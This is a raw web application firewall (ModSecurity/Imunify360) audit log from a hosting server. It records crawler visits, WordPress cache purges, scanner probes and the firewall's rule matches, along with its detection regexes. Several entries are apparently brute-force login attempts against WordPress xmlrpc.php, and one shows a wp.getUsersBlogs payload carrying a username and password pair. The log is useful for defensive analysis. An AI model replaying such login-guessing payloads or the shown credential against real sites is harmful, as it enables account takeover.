/.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751330692855179 1290847 (- - -) Stopwatch2: 1751330692855179 1290847; combined=2338, p1=83, p2=2031, p3=0, p4=0, p5=223, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --0c0d8074-Z-- --73824116-A-- [01/Jul/2025:06:14:54.195833 +0530] aGMvhoCn6y9y4ldwgOvinwAAABc 20.171.207.232 47554 192.168.74.40 443 --73824116-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/js/Rajasthan-Travel-Guides/js/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --73824116-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --73824116-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751330696515668 16560 (- - -) Stopwatch2: 1751330696515668 16560; combined=3610, p1=167, p2=3287, p3=0, p4=0, p5=155, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --96ea7d7e-Z-- --89ce5906-A-- [01/Jul/2025:06:14:56.846015 +0530] aGMvhg6iKh3t2y2EfwjfIwAAABE 103.185.74.40 30626 192.168.74.40 443 --89ce5906-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --89ce5906-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --89ce5906-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751330694356912 2489629 (- - -) Stopwatch2: 1751330694356912 2489629; combined=1732, p1=66, p2=1435, p3=0, p4=0, p5=230, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --89ce5906-Z-- --68cbf23c-A-- [01/Jul/2025:06:14:57.162965 +0530] aGMvifGKoc1BiGCuksEQDgAAAA8 124.156.226.179 53246 192.168.74.40 443 --68cbf23c-B-- GET /women.html HTTP/1.1 Host: www.jucosexpo.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --68cbf23c-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Connection: close -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d8dfe05e-Z-- --f6702c75-A-- [01/Jul/2025:06:33:11.945675 +0530] aGMzzw7BtT1UbD7ZHT9pSAAAAB8 43.153.74.75 53406 192.168.74.40 80 --f6702c75-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --f6702c75-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --f6702c75-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751331791936804 9275 (- - -) Stopwatch2: 1751331791936804 9275; combined=5723, p1=122, p2=5311, p3=104, p4=3, p5=182, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f6702c75-Z-- --67dc7543-A-- [01/Jul/2025:06:33:12.928097 +0530] aGMz0GEtLcOE7PLrCH5WcAAAAAU 20.171.207.232 39302 192.168.74.40 443 --67dc7543-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/Rajasthan-Travel-Guides/js/https/https/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --67dc7543-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --67dc7543-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/Rajasthan-Travel-Guides/js/https/https/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --7b00fc50-Z-- --68c78d2d-A-- [01/Jul/2025:06:34:49.967490 +0530] aGM0Mc-bN96naeOUiN1ZhgAAABE 147.185.133.239 60254 192.168.74.40 443 --68c78d2d-B-- GET / HTTP/1.1 Host: 103.185.74.40:443 User-Agent: Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com Accept-Encoding: gzip --68c78d2d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --68c78d2d-H-- Message: Access denied with code 403 (phase 1). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "121"] [id "77350470"] [msg "IM360 WAF: Vulnerability scanner detected||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 1) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751331889414206 553535 (- - -) Stopwatch2: 1751331889414206 553535; combined=271, p1=91, p2=0, p3=0, p4=0, p5=180, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --68c78d2d-Z-- --c1ceb70e-A-- [01/Jul/2025:06:34:50.050987 +0530] aGM0L5TzP1Ur28j7gprRnQAAACo 216.73.217.7 9522 192.168.74.40 80 --c1ceb70e-B-- GET /robots.txt HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) Accept-Encoding: gzip, br, zstd, deflate Host: rmhil.com Via: 1.1 squid-proxy-5b5d847c96-j2wms (squid/6.10) X-Forwarded-For: 10.3.22.169 Cache-Control: max-age=259200 Connection: keep-alive --c1ceb70e-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/7.4.33 Link: <https://rmhil.com/wp-json/>; rel="https://api.w.org/" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 --c1ceb70e-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/011_i360_otherapps.conf"] [line "434"] [id "77350583"] [msg "IM360 WAF: Scan attempt by claudebot crawler||UA:Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751334292763897 15904 (- - -) Stopwatch2: 1751334292763897 15904; combined=2984, p1=152, p2=2619, p3=0, p4=0, p5=213, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a4fb9e76-Z-- --da50c22b-A-- [01/Jul/2025:07:14:55.116953 +0530] aGM9lfVtJS68yMzN9xuwiQAAABU 103.185.74.40 63550 192.168.74.40 443 --da50c22b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --da50c22b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --da50c22b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751334293808260 1309017 (- - -) Stopwatch2: 1751334293808260 1309017; combined=2936, p1=109, p2=2636, p3=0, p4=0, p5=190, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --da50c22b-Z-- --a38bd649-A-- [01/Jul/2025:07:14:56.762807 +0530] aGM9l62-ixoIBBCJCfxxHgAAABc 103.185.74.40 59174 192.168.74.40 443 --a38bd649-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a38bd649-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a38bd649-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751334295327996 1435274 (- - -) Stopwatch2: 1751334295327996 1435274; combined=2174, p1=83, p2=1927, p3=0, p4=0, p5=164, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a38bd649-Z-- --9097dc63-A-- [01/Jul/2025:07:14:57.581788 +0530] aGM9mLpzrkpcv5GNoryYUgAAAA0 103.145.63.232 58782 192.168.74.40 443 --9097dc63-B-- POST /xmlrpc.php HTTP/1.1 Host: shreyamouldcrafts.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Content-Length: 224 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, br, zstd Accept-Language: ja-JP,ja;q=0.9 Content-Type: application/xml Referer: https://shreyamouldcrafts.com --9097dc63-C-- <?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>hukum</string></value></param><param><value><string>shreyamouldcrafts2017</string></value></param></params></methodCall> --9097dc63-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751336337399805 17098 (- - -) Stopwatch2: 1751336337399805 17098; combined=3279, p1=126, p2=2677, p3=0, p4=0, p5=475, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --2b57a477-Z-- --489aae2e-A-- [01/Jul/2025:07:48:59.830081 +0530] aGNFj3_j2110C7XX4gcMggAAABU 103.185.74.40 33588 192.168.74.40 443 --489aae2e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --489aae2e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --489aae2e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751336335976360 3854316 (- - -) Stopwatch2: 1751336335976360 3854316; combined=2276, p1=97, p2=2031, p3=0, p4=0, p5=148, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --489aae2e-Z-- --d9db740b-A-- [01/Jul/2025:07:49:00.163511 +0530] aGNFk7AFmXay8G4aXBADAgAAAAM 172.68.205.24 34530 192.168.74.40 80 --d9db740b-B-- POST /xmlrpc.php HTTP/1.1 Host: mariaalliedhealthscience.org X-Real-IP: 31.193.2.236 X-Remote-IP: 172.68.205.24 Content-Length: 211 x-forwarded-for: 31.193.2.236 accept-encoding: gzip Accept-Language: ru-RU,ru;q=0.9 Referer: http://mariaalliedhealthscience.org -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751336339270265 893671 (- - -) Stopwatch2: 1751336339270265 893671; combined=5921, p1=92, p2=5138, p3=235, p4=5, p5=370, sr=139, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d9db740b-Z-- --5ebefa00-A-- [01/Jul/2025:07:49:01.147918 +0530] aGNFlBZBUQk-wboZMiqhgQAAABc 103.185.74.40 3423 192.168.74.40 443 --5ebefa00-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --5ebefa00-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5ebefa00-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751336340041912 1106428 (- - -) Stopwatch2: 1751336340041912 1106428; combined=3171, p1=113, p2=2918, p3=0, p4=0, p5=139, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5ebefa00-Z-- --5941dc33-A-- [01/Jul/2025:07:49:10.640530 +0530] aGNFnhs_v8K_J_8qeCloPgAAAA8 43.135.130.202 55074 192.168.74.40 80 --5941dc33-B-- GET / HTTP/1.1 Host: sunraysyoga.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337097448714 16354 (- - -) Stopwatch2: 1751337097448714 16354; combined=2965, p1=172, p2=2656, p3=0, p4=0, p5=137, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --ab26594f-Z-- --136cee17-A-- [01/Jul/2025:08:01:37.467610 +0530] aGNIhJAal_lbtDt49KyZfAAAAD0 103.185.74.40 12127 192.168.74.40 443 --136cee17-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --136cee17-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --136cee17-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337092886065 4582262 (- - -) Stopwatch2: 1751337092886065 4582262; combined=2710, p1=104, p2=2456, p3=0, p4=0, p5=149, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --136cee17-Z-- --d44e7074-A-- [01/Jul/2025:08:01:37.501200 +0530] aGNIiegYxrXZL1YJMPV6qwAAAAk 195.210.127.8 63437 192.168.74.40 80 --d44e7074-B-- POST /xmlrpc.php HTTP/1.1 Host: infiact.com Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=84138d55a504a840affdf6142a7b2e32 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml Content-Length: 493 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337098126156 498562 (- - -) Stopwatch2: 1751337098126156 498562; combined=9165, p1=136, p2=8189, p3=243, p4=5, p5=502, sr=126, sw=90, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e5446871-Z-- --157b1940-A-- [01/Jul/2025:08:01:38.757537 +0530] aGNIiem0COR1YAqwx3-hRQAAAEI 103.185.74.40 11546 192.168.74.40 443 --157b1940-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --157b1940-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --157b1940-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337097677278 1080932 (- - -) Stopwatch2: 1751337097677278 1080932; combined=2504, p1=115, p2=2270, p3=0, p4=0, p5=119, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --157b1940-Z-- --5c288c65-A-- [01/Jul/2025:08:01:38.791280 +0530] aGNIikT6yyussdnsqIqhZwAAAAU 195.210.127.2 39715 192.168.74.40 443 --5c288c65-B-- POST //xmlrpc.php HTTP/1.1 Host: raghuveergears.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml Content-Length: 489 --5c288c65-C-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337895703621 20221 (- - -) Stopwatch2: 1751337895703621 20221; combined=7864, p1=192, p2=7181, p3=204, p4=4, p5=282, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --522be704-Z-- --e9d2205c-A-- [01/Jul/2025:08:14:57.649365 +0530] aGNLqF21aF0CJnh4fMjXwQAAAF4 103.185.74.40 5571 192.168.74.40 443 --e9d2205c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --e9d2205c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e9d2205c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337896349889 1299921 (- - -) Stopwatch2: 1751337896349889 1299921; combined=2225, p1=98, p2=1922, p3=0, p4=0, p5=205, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e9d2205c-Z-- --50b1c572-A-- [01/Jul/2025:08:14:57.660897 +0530] aGNLqYd9JBq-2RBWhPDCiQAAABU 20.171.207.232 38536 192.168.74.40 443 --50b1c572-B-- GET /rajasthan-tours-from-udaipur/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/https/aainag/rajasthan-tours-from-jaipur/images/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --50b1c572-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --50b1c572-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337898840669 56205 (- - -) Stopwatch2: 1751337898840669 56205; combined=2991, p1=151, p2=2656, p3=0, p4=0, p5=184, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" 